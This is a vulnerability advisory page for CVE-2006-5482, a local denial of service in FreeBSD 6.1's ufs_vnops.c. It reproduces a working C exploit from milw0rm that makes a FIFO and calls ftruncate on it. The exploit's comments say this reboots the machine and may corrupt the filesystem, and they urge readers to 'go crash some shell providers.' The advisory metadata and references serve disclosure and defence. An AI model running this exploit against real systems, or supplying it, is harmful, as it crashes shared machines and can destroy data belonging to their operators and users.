FreeBSD 'ufs_vnops.c' ftruncate Function Local Denial of Service Vulnerability

Vulnerability ID: 1111276    Vulnerability type: Other
Published: 2006-10-13    Updated: 2006-10-24
CVE ID: CVE-2006-5482    CNNVD-ID: CNNVD-200610-401
Platform: BSD    CVSS score: 2.1
|Vulnerability Source
https://www.exploit-db.com/exploits/2541
https://www.securityfocus.com/bid/87196
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-401
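|Vulnerability Details
ufs_vnops.c in FreeBSD 6.1 allows local users to cause an unspecified denial of service by calling the ftruncate function on a file whose type is not VREG, VLNK, or VDIR (a case that is not defined in POSIX).
|Exploit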
/* FreeBSD cvs commit: src/sys/ufs/ufs/ufs_vnops.c maxim 2006-05-31 13:15:29 UTC
   Log: According to POSIX, the result of ftruncate(2) is unspecified
   for file types other than VREG, VDIR and shared memory objects.
   We already handle VREG, VLNK and VDIR cases.  Silently ignore
   truncate requests for all the rest. PR kern/98064

   lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"!
   tested on FreeBSD 6.0-RELEASE-p5, 6.1-RELEASE-p10 (latest at the time of writing)
   - it just makes the system reboot, and with a bit of luck fucks up the filesystem.
   wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever.
   usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers.
   
*/

#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

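int main(){
    /* Create a FIFO named "lol"; mode 0x1b6 is 0666 octal. */
    mkfifo("lol",0x1b6);
    int fd = open("lol",O_RDWR);
    /* ftruncate(2) on a FIFO, i.e. a file type other than VREG, VLNK or VDIR,
       which is the case the commit log above refers to. */
    ftruncate(fd,12345);
    close(fd);
    return 0;
}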

// milw0rm.com [2006-10-13]
|Affected Products
FreeBSD FreeBSD 6.1
|References

Source: SECUNIA
Name: 22413
Link: http://secunia.com/advisories/22413
Source: MLIST
Name: [freebsd-cvs-src] 20060531 cvs commit: src/sys/ufs/ufs ufs_vnops.c
Link: http://lists.freebsd.org/pipermail/cvs-src/2006-May/064488.html
Source: BID
Name: 20522
Link: http://www.securityfocus.com/bid/20522